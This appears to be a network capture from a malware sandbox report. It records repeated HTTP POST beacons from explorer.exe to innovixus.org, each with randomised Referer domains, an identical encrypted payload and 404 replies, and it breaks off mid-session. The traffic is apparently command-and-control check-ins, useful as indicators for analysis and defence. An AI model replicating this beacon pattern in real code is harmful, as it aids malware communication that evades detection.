                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:56.068592072 CET278OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://wciteamqoct.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:56.068593025 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:56.325535059 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:56 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              78192.168.11.2049832150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:56.526329041 CET282OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://hpggdrpjkrtesqk.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:56.526329041 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:56.785507917 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:56 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              79192.168.11.2049833150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:56.985641003 CET278OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://mdtcasgisyu.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:56.985641003 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:57.245830059 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:57 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              80192.168.11.2049834150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:57.448579073 CET282OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://ksgdumofrrpqcbv.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:57.448579073 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:57.707782984 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:57 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              81192.168.11.2049835150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:57.909950972 CET280OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://yhxmqjhxmmtpn.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:57.909950972 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:58.166568995 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:58 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              82192.168.11.2049836150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:58.368467093 CET282OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://fiiuoufutbepbih.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:58.368468046 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:58.621453047 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:58 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              83192.168.11.2049837150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:58.822531939 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://bouyuhdowqsvpwaa.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:58.822532892 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:59.168651104 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:59 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              84192.168.11.2049838150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:59.538197994 CET279OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://vlbiletkotpx.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:59.538198948 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:59.795578957 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:59 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              85192.168.11.2049839150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:00.003407955 CET281OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://ayedvfnkellwpk.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:00.003407955 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:00.262762070 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:00 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              86192.168.11.2049840150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:00.470902920 CET282OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://juvgyvgryccsybw.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:00.470902920 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:00.739084959 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:00 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              87192.168.11.2049841150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:01.099571943 CET281OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://tprymwqmssylqg.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:01.099571943 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:01.359375954 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:01 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              88192.168.11.2049842150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:01.561084032 CET278OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://vyjdbgoxigg.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:01.561084032 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:01.821063995 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:01 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              89192.168.11.2049843150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:02.020255089 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://kqktbmjxaerlpbeh.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:02.020255089 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:02.272998095 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:02 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              90192.168.11.2049844150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:02.473279953 CET279OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://ulwcyvvuoypa.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:02.473279953 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:02.730917931 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:02 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              91192.168.11.2049845150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:02.930721998 CET279OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://neuyhssykmbe.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
